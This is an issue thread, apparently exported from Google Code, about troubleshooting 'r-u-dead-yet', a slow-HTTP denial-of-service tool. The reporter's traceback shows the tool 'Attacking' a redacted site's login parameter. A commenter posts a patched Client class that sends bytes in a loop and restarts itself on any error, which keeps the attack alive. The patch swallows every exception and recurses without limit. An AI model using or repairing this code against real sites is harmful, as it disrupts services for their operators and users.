### ISSUE TITLE
error: (32, 'Broken pipe')

### ISSUE THREAD

**Issue by GoogleCodeExporter** [loganhasson/r-u-dead-yet#8]
```
What steps will reproduce the problem?
1. Attempted to run the program after initially downloading.
2. Corrected initial issue, worked fine one time and now am receiving another 
error.
3. Run again after the first working run time.

What is the expected output? What do you see instead?
Expected it to run, saw this:

./r-u-dead-yet-v2.2.py
  File "./r-u-dead-yet-v2.2.py", line 31
    class Parser():
                 ^
SyntaxError: invalid syntax


What version of the product are you using? On what operating system?
2.2 on centos 5

Please provide any additional information below.
I updated it to be the following and it now runs partially. New speedbump though
class Parser: 
Testing with 1 connection for the sake of length: 

/r-u-dead-yet-v2.2.py
[!] Using configuration file
[!] Attacking: http://www.****.***
[!] With parameter: login
Process Client-1:
Traceback (most recent call last):
  File "/usr/lib/python2.4/site-packages/multiprocessing/process.py", line 237, in _bootstrap
    self.run()
  File "./r-u-dead-yet-v2.2.py", line 179, in run
    c.send("A")
  File "./r-u-dead-yet-v2.2.py", line 163, in send
    self.s.send(data)
error: (32, 'Broken pipe')

What version of Python should this be using? I can't get around this error no 
matter what I do. Tried restarting bind, flushing iptables, etc. 

Also, for those running on low mem servers (VPS) 
Lower the # max connections if you get memory errors.
```

Original issue reported on code.google.com by `ma77o23...@gmail.com` on 27 Jan 2011 at 5:23

**Comment by ammarx** [comment]
A quick fix would be to put those above lines in a Try Catch statement and at the exception call the function again. Below is the fixed code that runs completely fine.

```
class Client(Process):
    def __init__(self,host,port,headers,proxy_addr,proxy_port):
        Process.__init__(self)
        self.host = host
        self.port = port
        self.headers = headers
        self.proxy_addr = proxy_addr
        self.proxy_port = proxy_port
    def run(self):
        try:
            c = connection(self.host,self.port,self.headers,self.proxy_addr,self.proxy_port)
            c.connect()
            while 1:
                c.send("A")
                sleep(10)
        except:
            print "request sent!"
            self.run()
```
